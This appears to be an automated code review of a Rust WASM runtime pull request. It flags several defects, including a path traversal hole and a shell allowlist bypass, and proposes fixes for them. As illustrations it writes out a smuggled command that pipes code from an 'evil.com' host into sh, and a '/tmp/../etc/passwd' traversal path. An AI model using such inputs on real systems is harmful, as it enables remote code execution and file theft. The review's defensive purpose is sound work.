total_tasks = progress.total_tasks,
progress_pct = progress.progress_pct,
"Received task progress"
);
let record = TaskProgressRecord {
submission_id: progress.submission_id.clone(),
challenge_id: progress.challenge_id,
validator: progress.validator,
task_index: progress.task_index,
total_tasks: progress.total_tasks,
status: progress.status,
progress_pct: progress.progress_pct,
updated_at: progress.timestamp,
};
state_manager.apply(|state| {
state.update_task_progress(record);
});
}

⚠️ Potential issue | 🟠 Major

TaskProgress handler also processes state mutations without signature verification.

The TaskProgress handler creates a TaskProgressRecord and updates state via state.update_task_progress(record) without verifying the progress.signature. A malicious peer could forge progress updates for submissions it isn't assigned to evaluate.

Same guideline concern as the JobAssignment handler above.
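A hedged sketch of the requested check, assuming ed25519 signatures (the project's actual key scheme and canonical serialization may differ):

```rust
use ed25519_dalek::{Signature, Verifier, VerifyingKey};

/// `canonical_bytes` is a stable serialization of the progress fields
/// (submission_id, challenge_id, task_index, ...); the helper name and
/// signature layout here are hypothetical.
fn verify_task_progress(
    validator_key: &VerifyingKey,
    canonical_bytes: &[u8],
    signature_bytes: &[u8; 64],
) -> bool {
    let sig = Signature::from_bytes(signature_bytes);
    validator_key.verify(canonical_bytes, &sig).is_ok()
}
```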


Comment on lines +234 to +242
pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
let mut buf = vec![0u8; 65536];
let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
if status < 0 {
return Err(status);
}
buf.truncate(status as usize);
Ok(buf)
}

⚠️ Potential issue | 🔴 Critical

Disabled status (positive 1) slips through the status < 0 error check, causing data corruption.

The host-side ConsensusHostStatus::Disabled has value 1 (positive). When the host returns 1 for a disabled consensus, these wrappers treat it as a successful response of 1 byte, truncating the zero-initialized buffer to a single byte and returning Ok(vec![0]). The caller will misinterpret garbage as valid validator/vote data.

This applies to host_consensus_get_validators and host_consensus_get_votes. The same class of bug exists for host_consensus_get_state_hash (Line 262) where status == 1 is treated as success, though the impact there is returning a zeroed hash rather than corrupt data.

🐛 Proposed fix: check for positive non-success status codes
 pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
     let mut buf = vec![0u8; 65536];
     let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
-    if status < 0 {
+    if status < 0 || status == 1 {
+        // 1 = Disabled
         return Err(status);
     }
     buf.truncate(status as usize);
     Ok(buf)
 }
 pub fn host_consensus_get_votes() -> Result<Vec<u8>, i32> {
     let mut buf = vec![0u8; 65536];
     let status = unsafe { consensus_get_votes(buf.as_mut_ptr() as i32, buf.len() as i32) };
-    if status < 0 {
+    if status < 0 || status == 1 {
+        // 1 = Disabled
         return Err(status);
     }
     buf.truncate(status as usize);
     Ok(buf)
 }

Alternatively, consider a more robust fix: change ConsensusHostStatus::Disabled to a negative value (e.g., -10) in consensus.rs so all non-success statuses are negative, aligning with the error-detection pattern used throughout the SDK. The same issue exists for TerminalHostStatus::Disabled = 1 in terminal.rs.

Also applies to: 252-260


Comment on lines +30 to +39
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum ConsensusHostStatus {
Success = 0,
Disabled = 1,
BufferTooSmall = -1,
ProposalLimitExceeded = -2,
InvalidArgument = -3,
InternalError = -100,
}

⚠️ Potential issue | 🔴 Critical

Disabled = 1 (positive) is the root cause of the SDK-side data corruption bug.

ConsensusHostStatus::Disabled = 1 is the only non-success status with a positive value. This breaks the convention used by SDK wrappers (status < 0 → error). Functions returning buffer sizes (like handle_get_validators) will cause the SDK to misinterpret 1 as "1 byte written."

Consider making all non-success statuses negative, or at minimum, making Disabled negative.

🐛 Proposed fix
 pub enum ConsensusHostStatus {
     Success = 0,
-    Disabled = 1,
+    Disabled = -10,
     BufferTooSmall = -1,
     ProposalLimitExceeded = -2,
     InvalidArgument = -3,
     InternalError = -100,
 }

Update from_i32 accordingly:

     pub fn from_i32(code: i32) -> Self {
         match code {
             0 => Self::Success,
-            1 => Self::Disabled,
+            -10 => Self::Disabled,
             -1 => Self::BufferTooSmall,
             -2 => Self::ProposalLimitExceeded,
             -3 => Self::InvalidArgument,
             _ => Self::InternalError,
         }
     }

Comment on lines +428 to +456
let mut child = cmd
.spawn()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;

if has_stdin {
if let Some(ref stdin_data) = request.stdin {
if let Some(ref mut stdin) = child.stdin {
use std::io::Write;
let _ = stdin.write_all(stdin_data);
}
}
child.stdin.take();
}

let output = loop {
if start.elapsed() > timeout {
let _ = child.kill();
return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
}
match child.try_wait() {
Ok(Some(_)) => {
break child
.wait_with_output()
.map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
}
Ok(None) => std::thread::sleep(Duration::from_millis(10)),
Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
}
};

⚠️ Potential issue | 🟠 Major

Potential deadlock when writing stdin to a child process with piped stdout/stderr.

If the child process produces enough output to fill the OS pipe buffer for stdout/stderr before consuming all its stdin, write_all on line 436 will block waiting for the child to read, while the child is blocked waiting for us to read its stdout. This is a classic deadlock scenario with synchronous piped I/O (the Rust std::process docs warn about this). The timeout loop on lines 442–456 would never be reached.

Consider writing stdin in a separate thread, or using wait_with_output() (which handles the I/O concurrently) after spawning the child with stdin pre-written via a separate thread.

Sketch of a safer approach
-    let mut child = cmd
-        .spawn()
-        .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
-
-    if has_stdin {
-        if let Some(ref stdin_data) = request.stdin {
-            if let Some(ref mut stdin) = child.stdin {
-                use std::io::Write;
-                let _ = stdin.write_all(stdin_data);
-            }
-        }
-        child.stdin.take();
-    }
-
-    let output = loop {
-        if start.elapsed() > timeout {
-            let _ = child.kill();
-            return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
-        }
-        match child.try_wait() {
-            Ok(Some(_)) => {
-                break child
-                    .wait_with_output()
-                    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
-            }
-            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
-            Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
-        }
-    };
+    let mut child = cmd
+        .spawn()
+        .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?;
+
+    // Write stdin on a separate thread to avoid deadlock with piped stdout/stderr
+    if has_stdin {
+        let stdin_data = request.stdin.clone().unwrap_or_default();
+        let mut child_stdin = child.stdin.take().unwrap();
+        std::thread::spawn(move || {
+            use std::io::Write;
+            let _ = child_stdin.write_all(&stdin_data);
+            // child_stdin is dropped here, closing the pipe
+        });
+    }
+
+    let output = loop {
+        if start.elapsed() > timeout {
+            let _ = child.kill();
+            return Err(SandboxExecError::ExecutionTimeout(timeout.as_secs()));
+        }
+        match child.try_wait() {
+            Ok(Some(_)) => {
+                break child
+                    .wait_with_output()
+                    .map_err(|e| SandboxExecError::ExecutionFailed(e.to_string()))?
+            }
+            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
+            Err(e) => return Err(SandboxExecError::ExecutionFailed(e.to_string())),
+        }
+    };

Comment on lines +30 to +43
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum TerminalHostStatus {
    Success = 0,
    Disabled = 1,
    CommandNotAllowed = -1,
    PathNotAllowed = -2,
    FileTooLarge = -3,
    BufferTooSmall = -4,
    IoError = -5,
    LimitExceeded = -6,
    Timeout = -7,
    InternalError = -100,
}

⚠️ Potential issue | 🟠 Major

Disabled = 1 (positive) breaks the SDK's status < 0 error-detection pattern.

TerminalHostStatus::Disabled is set to 1, but SDK-side wrappers (e.g., host_terminal_exec) use status < 0 to detect errors. When the terminal is disabled, the host returns 1, which the SDK misreads as 1 byte of data written successfully. Change Disabled to a negative value so it follows the error-detection convention.
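A minimal sketch of the realigned enum; the exact value -8 is an assumption (any unused negative code works), and any SDK constants or tests pinned to the old value would need the same update:

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(i32)]
pub enum TerminalHostStatus {
    Success = 0,
    CommandNotAllowed = -1,
    PathNotAllowed = -2,
    FileTooLarge = -3,
    BufferTooSmall = -4,
    IoError = -5,
    LimitExceeded = -6,
    Timeout = -7,
    Disabled = -8, // was 1; negative so SDK `status < 0` checks treat it as an error
    InternalError = -100,
}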

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 30 - 43,
TerminalHostStatus::Disabled is currently set to a positive value (1) which
breaks the SDK's error-detection pattern (status < 0); change the Disabled
variant in the TerminalHostStatus enum to a negative error code (e.g., -8 or
another unused negative value) so it is treated as an error by SDK wrappers like
host_terminal_exec, and update any related docs/tests/constants that assume the
old value.

Comment on lines +139 to +147
    pub fn is_path_allowed(&self, path: &str) -> bool {
        if !self.enabled {
            return false;
        }
        if self.allowed_paths.is_empty() {
            return true;
        }
        self.allowed_paths.iter().any(|p| path.starts_with(p))
    }

⚠️ Potential issue | 🔴 Critical

Critical: Path traversal via .. components bypasses is_path_allowed.

is_path_allowed uses a simple path.starts_with(p) check without canonicalizing the path. A WASM module can pass "/tmp/../etc/passwd" which passes the /tmp prefix check but resolves to /etc/passwd when std::fs::read is called.

Proposed fix: canonicalize before checking
     pub fn is_path_allowed(&self, path: &str) -> bool {
         if !self.enabled {
             return false;
         }
         if self.allowed_paths.is_empty() {
             return true;
         }
-        self.allowed_paths.iter().any(|p| path.starts_with(p))
+        // Canonicalize to resolve ".." and symlinks before checking the prefix
+        let canonical = match std::fs::canonicalize(path) {
+            Ok(p) => p,
+            // For write operations the file may not exist yet; resolve the parent
+            Err(_) => {
+                let parent = std::path::Path::new(path).parent();
+                match parent.and_then(|p| std::fs::canonicalize(p).ok()) {
+                    Some(p) => p,
+                    None => return false,
+                }
+            }
+        };
+        let canonical_str = canonical.to_string_lossy();
+        self.allowed_paths.iter().any(|p| canonical_str.starts_with(p))
     }

Also applies to: 397-409
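For illustration, a hypothetical check once the canonicalizing version is in place (the Default impl for the remaining TerminalPolicy fields is an assumption, and the assert relies on /etc/passwd existing on the host):

let policy = TerminalPolicy {
    enabled: true,
    allowed_paths: vec!["/tmp".to_string()],
    ..Default::default()
};
// "/tmp/../etc/passwd" canonicalizes to "/etc/passwd", which does not start
// with "/tmp", so the traversal attempt is rejected.
assert!(!policy.is_path_allowed("/tmp/../etc/passwd"));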

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 139 - 147, The
is_path_allowed function currently checks prefixes with path.starts_with(p)
which allows path traversal like "/tmp/../etc/passwd"; change the check to
compare normalized/canonicalized paths: normalize the incoming path (resolve
"."/".." components and make it absolute) and normalize the stored allowed_paths
before comparison (or canonicalize both using std::fs::canonicalize where
possible), and on any canonicalization/error return false; update the same
prefix-check logic in the other occurrence of this permission check so
comparisons use normalized absolute paths rather than raw starts_with.

Comment on lines +283 to +375
fn handle_terminal_exec(
    caller: &mut Caller<RuntimeState>,
    cmd_ptr: i32,
    cmd_len: i32,
    result_ptr: i32,
    result_len: i32,
) -> i32 {
    let enabled = caller.data().terminal_state.policy.enabled;
    if !enabled {
        return TerminalHostStatus::Disabled.to_i32();
    }

    let cmd_bytes = match read_wasm_memory(caller, cmd_ptr, cmd_len) {
        Ok(bytes) => bytes,
        Err(err) => {
            warn!(error = %err, "terminal_exec: failed to read command from wasm memory");
            return TerminalHostStatus::InternalError.to_i32();
        }
    };

    let cmd_str = match std::str::from_utf8(&cmd_bytes) {
        Ok(s) => s.to_string(),
        Err(_) => return TerminalHostStatus::InternalError.to_i32(),
    };

    let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();

    {
        let state = &caller.data().terminal_state;
        if !state.policy.is_command_allowed(&command_name) {
            warn!(
                challenge_id = %state.challenge_id,
                command = %command_name,
                "terminal_exec: command not allowed"
            );
            return TerminalHostStatus::CommandNotAllowed.to_i32();
        }
        if state.executions >= state.policy.max_executions {
            return TerminalHostStatus::LimitExceeded.to_i32();
        }
    }

    let timeout_ms = caller.data().terminal_state.policy.timeout_ms;
    let max_output = caller.data().terminal_state.policy.max_output_bytes;

    let output = match Command::new("sh")
        .arg("-c")
        .arg(&cmd_str)
        .stdin(std::process::Stdio::null())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()
    {
        Ok(child) => {
            let start = std::time::Instant::now();
            let timeout = Duration::from_millis(timeout_ms);
            match child.wait_with_output() {
                Ok(out) => {
                    if start.elapsed() > timeout {
                        return TerminalHostStatus::Timeout.to_i32();
                    }
                    out
                }
                Err(err) => {
                    warn!(error = %err, "terminal_exec: command wait failed");
                    return TerminalHostStatus::IoError.to_i32();
                }
            }
        }
        Err(err) => {
            warn!(error = %err, "terminal_exec: command spawn failed");
            return TerminalHostStatus::IoError.to_i32();
        }
    };

    caller.data_mut().terminal_state.executions += 1;

    let mut result_data = output.stdout;
    if result_data.len() > max_output {
        result_data.truncate(max_output);
    }

    if result_len < 0 || result_data.len() > result_len as usize {
        return TerminalHostStatus::BufferTooSmall.to_i32();
    }

    if let Err(err) = write_wasm_memory(caller, result_ptr, &result_data) {
        warn!(error = %err, "terminal_exec: failed to write result to wasm memory");
        return TerminalHostStatus::InternalError.to_i32();
    }

    result_data.len() as i32
}

⚠️ Potential issue | 🔴 Critical

Critical: Command allowlist is trivially bypassed and timeout is ineffective.

Two serious security issues in handle_terminal_exec:

  1. Allowlist bypass: Line 308 extracts only the first word as command_name, but lines 328-330 always execute via sh -c <entire_cmd_str>. A WASM module sending "echo hi; curl http://evil.com | sh" passes the check (split_whitespace yields "echo", which is allowed) but executes arbitrary shell commands. The allowlist provides no real protection.

  2. Blocking + ineffective timeout: child.wait_with_output() (line 339) blocks until the process exits, and the timeout check at line 341 only runs after the process has already completed, so sleep 99999 will block the WASM host thread indefinitely. Use tokio::process::Command with a timeout, or poll child.try_wait() against a deadline and kill the child when it expires.

Sketch for a safer exec approach
-    let command_name = cmd_str.split_whitespace().next().unwrap_or("").to_string();
+    // Parse the command properly: only allow direct execution of the binary,
+    // not shell interpretation. Reject commands containing shell metacharacters.
+    let parts: Vec<&str> = cmd_str.split_whitespace().collect();
+    let command_name = parts.first().copied().unwrap_or("");
 
     {
         let state = &caller.data().terminal_state;
         if !state.policy.is_command_allowed(&command_name) {
             // ...
         }
     }
 
-    let output = match Command::new("sh")
-        .arg("-c")
-        .arg(&cmd_str)
+    let output = match Command::new(command_name)
+        .args(&parts[1..])
         .stdin(std::process::Stdio::null())
         .stdout(std::process::Stdio::piped())
         .stderr(std::process::Stdio::piped())
         .spawn()

For timeout enforcement, use a polling loop with child.try_wait() (sketched below) or spawn the process on a background thread with a kill deadline.
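A minimal sketch of the polling variant; wait_with_deadline is a hypothetical helper, and the error codes reuse the TerminalHostStatus values quoted above:

use std::process::{Child, Output};
use std::time::{Duration, Instant};

// Polls the child until it exits or the deadline passes; kills it on timeout
// so `timeout_ms` is actually enforced instead of being checked after the fact.
fn wait_with_deadline(mut child: Child, timeout: Duration) -> Result<Output, TerminalHostStatus> {
    let deadline = Instant::now() + timeout;
    loop {
        match child.try_wait() {
            // Process exited: collect the piped stdout/stderr.
            Ok(Some(_)) => {
                return child
                    .wait_with_output()
                    .map_err(|_| TerminalHostStatus::IoError)
            }
            Ok(None) if Instant::now() >= deadline => {
                let _ = child.kill();
                let _ = child.wait(); // reap the killed process so no zombie is left
                return Err(TerminalHostStatus::Timeout);
            }
            Ok(None) => std::thread::sleep(Duration::from_millis(10)),
            Err(_) => return Err(TerminalHostStatus::IoError),
        }
    }
}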

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 283 - 375,
handle_terminal_exec currently validates only the first token (command_name) but
then runs the entire cmd_str via "sh -c", and it blocks on
child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.

Comment on lines +565 to +600
fn handle_terminal_random_seed(
    caller: &mut Caller<RuntimeState>,
    buf_ptr: i32,
    buf_len: i32,
) -> i32 {
    if buf_len <= 0 {
        return TerminalHostStatus::InternalError.to_i32();
    }

    let len = buf_len as usize;
    let mut seed = vec![0u8; len];

    // Use a deterministic seed based on challenge_id and timestamp for reproducibility
    let challenge_id = caller.data().challenge_id.clone();
    let ts = caller
        .data()
        .fixed_timestamp_ms
        .unwrap_or_else(|| chrono::Utc::now().timestamp_millis());

    use sha2::{Digest, Sha256};
    let mut hasher = Sha256::new();
    hasher.update(challenge_id.as_bytes());
    hasher.update(ts.to_le_bytes());
    let hash = hasher.finalize();

    for (i, byte) in seed.iter_mut().enumerate() {
        *byte = hash[i % 32];
    }

    if let Err(err) = write_wasm_memory(caller, buf_ptr, &seed) {
        warn!(error = %err, "terminal_random_seed: failed to write to wasm memory");
        return TerminalHostStatus::InternalError.to_i32();
    }

    TerminalHostStatus::Success.to_i32()
}

⚠️ Potential issue | 🟡 Minor

Random seed is not truly deterministic across validators for the same challenge.

handle_terminal_random_seed uses challenge_id + timestamp to derive a seed. When fixed_timestamp_ms is None, it falls back to chrono::Utc::now() (line 582), which will differ across validators and produce different seeds for the same challenge. This breaks the deterministic execution guarantee for challenges unless fixed_timestamp_ms is always set.

Additionally, the seed varies only by challenge_id and timestamp, so multiple calls within the same millisecond return identical bytes. Consider incorporating a per-call counter, as sketched below.

Based on learnings: "Challenge evaluation must execute deterministically within the WASM runtime sandbox."
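A sketch of that derivation; terminal_seed_counter is a hypothetical u64 field on RuntimeState, and failing closed when fixed_timestamp_ms is unset is one possible policy:

// Inside handle_terminal_random_seed, replacing the Utc::now() fallback.
let challenge_id = caller.data().challenge_id.clone();

// Fail closed instead of falling back to wall-clock time.
let Some(ts) = caller.data().fixed_timestamp_ms else {
    return TerminalHostStatus::InternalError.to_i32();
};

// Per-call counter so repeated calls yield distinct, still-deterministic seeds.
let counter = caller.data().terminal_seed_counter;
caller.data_mut().terminal_seed_counter += 1;

use sha2::{Digest, Sha256};
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(ts.to_le_bytes());
hasher.update(counter.to_le_bytes());
let hash = hasher.finalize();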

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@crates/wasm-runtime-interface/src/terminal.rs` around lines 565 - 600,
handle_terminal_random_seed currently uses chrono::Utc::now() when
fixed_timestamp_ms is None which yields non-deterministic seeds across
validators; change to only use deterministic inputs (challenge_id and a
deterministic per-call counter stored on RuntimeState) and fail if
fixed_timestamp_ms is not set or omit timestamp entirely. Specifically: in
handle_terminal_random_seed, remove the chrono::Utc fallback and instead read a
call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.

@echobt echobt closed this Feb 20, 2026